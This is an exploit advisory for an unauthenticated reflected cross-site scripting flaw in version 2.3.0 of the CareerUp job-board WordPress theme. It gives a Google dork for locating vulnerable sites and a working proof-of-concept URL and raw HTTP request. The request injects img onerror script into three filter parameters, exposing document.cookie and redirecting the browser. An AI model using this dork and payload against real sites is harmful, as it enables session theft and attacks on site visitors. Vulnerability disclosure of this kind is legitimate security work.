[+] Exploit Title: CareerUp - Job Board WordPress Theme v2.3.0 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/careerup/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: ApusTheme [ https://themeforest.net/user/apustheme ]
[+] Software Version: 2.3.0
[+] Software Link: https://themeforest.net/item/careerup-job-board-wordpress-theme/24002090
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the CareerUp Job Board theme through 2.3.0 for WordPress.



### [ PoC: ]

[!] https://apusthemes.com/wp-demo/careerup/jobs/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&filter-center-location=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&filter-distance=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`;%3E

[!] GET /wp-demo/careerup/jobs/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&filter-center-location=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&filter-distance=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`;%3E HTTP/1.1
Host: apusthemes.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector